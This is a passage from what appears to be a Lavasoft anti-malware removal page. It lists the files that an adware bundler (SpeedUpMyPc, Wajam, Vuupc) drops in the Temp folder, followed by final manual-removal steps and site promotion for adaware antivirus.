    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\SpeedUpMyPcinfo.dfe (1215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-logo.png (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet-short.gif (54 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\logo-win.jpg (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-img2.png (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\config.dmc (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\cross.jpg (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Wajaminfo.dfe (3326 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3D.css (539 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2B.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Genesis\info.html (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Browser app\info.html (1497 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app.jpg (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\butplay.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position1A.css (421 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\binghp4.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1.png (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1-gris.png (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3A.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Vuupcinfo.dfe (741 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1a.png (11 bytes)
    %System%\wbem\Logs\wbemprox.log (228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Wajam\info.html (3609 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Vuupc\info.html (1287 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress_small_bg.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\check.jpg (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\speedupmypc.css (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\wajam.css (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2.png (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\thebestdeals.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet.gif (58 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Dockings.dfe (2617 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position4A.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-big.png (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\SpeedUpMyPc\info.html (2953 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin.dmc (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\be393027e81a4b88b52679c3751607ae.txt (7854 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nswB5.tmp\nsisdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe (1431 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\res.txt (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe.config (767 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 

  5. Reboot the computer.
    6. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now